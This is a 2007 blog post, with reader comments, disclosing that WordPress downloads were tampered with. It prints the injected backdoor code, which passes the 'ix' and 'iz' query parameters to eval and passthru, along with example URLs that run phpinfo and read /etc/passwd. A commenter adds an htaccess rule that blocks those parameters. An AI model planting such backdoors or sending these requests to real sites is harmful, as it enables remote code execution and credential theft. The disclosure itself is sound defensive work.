Saturday, March 3, 2007

WordPress source code compromised to enable remote code execution

While assessing the security of WordPress, a popular blog creation software, I have discovered that it's source code has recently been compromised by a third party in order to enable remote command execution on the machines running affected versions. The compromised files are wp-includes/feed.php and wp-includes/theme.php.
The following code has been added:

in wp-includes/feed.php

function comment_text_phpfilter($filterdata) {
eval($filterdata);
}
...
if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }


in wp-includes/theme.php

function get_theme_mcommand($mcds) {
passthru($mcds);
}
...
if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }



this would enable remote command execution on machines running compromised versions, for example

http://wordpressurl/wp-includes/feed.php?ix=phpinfo();
http://wordpressurl/wp-includes/theme.php?iz=cat /etc/passwd


I have discovered this vulnerability on Friday, March 2nd 2007 and contacted WordPress about it straight away. They reacted promptly by disabling downloads until further investigation. Later they determined that ony one of two servers has been compromised and that the two files mentioned above are the only ones changed.

It seems that the above files were changed on Feb 25th, 2007, so if you downloaded WordPress between Feb 25th, 2007 and Mar 2nd 2007 it is possible that you are running a compromised version, so be sure to check for the above code.

About Wordpress
"WordPress is a state-of-the-art semantic personal publishing platform with a focus on aesthetics, web standards, and usability. What a mouthful. WordPress is both free and priceless at the same time."

Thanks to Ryan Boren of WordPress for quick response and his feedback regarding this issue.

11 comments:

Mr Apache said...

Code to Forbid requests with querystrings ix or iz


RewriteCond %{QUERY_STRING} (ix|iz)
RewriteRule .* - [F]


Ultimate htaccess article

Doug Karr said...

Ivan,

Could this be utilized to obtain any information from the source site? Example: logins, passwords, MySQL configuration, OpenID configuration, etc?

I'm curious if simply downloading and installing the corrected software is a total solution or whether or not anyone is advising WP users to reconfigure their logins/passwords, etc.

Thanks!
Doug

Ivan Fratric said...

Dear Doug,

the exploitation of this, by itself, leads to command execution on the effected machine under the privileges of web server user, typically 'nobody'. This means that the cracker could read any files readable to this user. This typically includes web application configuration files (which typically contain mySQL username and password the web application uses to connect to the database), as well as files such as /etc/passwd, which contains a list of usernames for the server, which could be used in brute-force type attacks. Cracker could also modify any files writeable by this user and also upload files in folders writeable to this user.

However, you should also consider the following - obtaining the admin privileges on the machine once you have established the remote access, even as an unprivileged user, is usually by far easier than obtaining the remote access itself.

So to conclude, if you were running the compromised version (and it's quite easy to check if you kept the downloaded archive somewhere) it would be best if you changed all relevant passwords and logins where appropriate.

Ivan Fratric said...

Plus, the cracker might manage to put some kind of backdoor on the server using this, so the absolutely safest thing to do would be to make the clean install of everything.

ceras said...

That bug dont work, i have wordpress from january, this files feed.php ...


and execution command dont work, i have white page :)

That fucking bullshits not bug

Ivan Fratric said...

Ceras,

You wouldn't be affected if you downloaded WordPress in January, only if you downloaded it between Feb 25th and Mar 2nd and only if you downloaded it from the compromised server.

If you want confirmation, take a look at
http://wordpress.org/development/2007/03/upgrade-212/

Shelly said...

I had a question. I just installed WP 2.1 (NOT 2.1.1) a few weeks ago for a client who needed 16 different installations (didn't want to use MU).

I've been told by the wp-pro list that I *should* be okay with 2.1, because the exploit wasn't in that version (and if it were, I had downloaded my copy January 28 - so I'm in the clear anyway). However, someone said that the reason 2.1.1 was released was to fix another security flaw, and I should have upgraded anyway.

I guess I'd like to know this: should I download the new 2.1.2 and upgrade all 16 of those blogs already? I don't know what security flaw is in 2.1 - nothing was mentioned - but I'd appreciate any advice on this.

Ivan Fratric said...

Shelly,

you really should be asking this in a WordPress support forum.
Having said that, I'm not aware of any vulnerabilities fixed from 2.1 to 2.1.1 (which doesn't mean there weren't any), but there are known vulnerabilities in 2.1.1 which are possibly present in previous versions as well. You can find out the details at
http://www.securityfocus.com/bid/22738
and
http://www.securityfocus.com/archive/1/461440
These are all script injection vulnerabilities. They aren't exactly what I would call critical, but should be taken care of nevertheless.

Shelly said...

Thanks Ivan,

Actually, I *did* ask at the support forums - I guess I'm impatient ;) I did get advice on basically what you said: that it wouldn't hurt to upgrade to 2.1.2, but it's not absolutely necessary.

I've already emailed the client with this information, and I'm letting them decide what they want me to do. I couldn't find the exact information you gave me (about the injection), but I did tell them there wouldn't have been an upgrade if it weren't something important.

Thanks for your advice - I appreciate it :)

Anonymous said...

Hii,
For the time being this bug is not working on any of the Wordpress i tried. But this post is good, thanks for sharing..

Best Regards,
Eliena Andrews
http://visitformoney.blogspot.com

Piyush said...

Hi Ivan,
I have posted about your discovery on my blog. Here is the link.
Thanks for sharing this.
-
Piyush